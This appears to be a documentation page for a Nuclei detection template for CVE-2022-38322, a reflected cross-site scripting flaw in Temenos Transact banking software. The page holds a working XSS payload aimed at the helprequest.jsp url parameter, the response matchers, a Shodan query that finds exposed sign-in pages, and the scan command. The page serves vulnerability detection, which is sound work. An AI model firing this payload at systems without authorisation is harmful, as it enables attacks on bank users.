Temenos Transact - Cross-Site Scripting
ID: CVE-2022-38322
Severity: high
Author: qotoz
Tags: cve,cve2022,temenos,transact,xss
Description
Section titled “Description”Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
YAML Source
Section titled “YAML Source”id: CVE-2022-38322
info: name: Temenos Transact - Cross-Site Scripting author: qotoz severity: high description: | Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks. reference: - https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/ metadata: verified: true max-request: 1 shodan-query: http.title:"transact sign in","t24 sign in" tags: cve,cve2022,temenos,transact,xss
http: - method: GET path: - "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"
matchers-condition: and matchers: - type: word part: body words: - setupHelp('')" onerror="confirm('document.domain')
- type: word part: content_type words: - 'text/html'
- type: status status: - 200# digest: 490a0046304402202888b096a08f04f87a75a578ca70371181e479a15b13016f93bc61cd58a904bb02200c5784d6758b80822d8951408b526b130e45355e464064513da7c36c5c735bad:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-38322.yaml"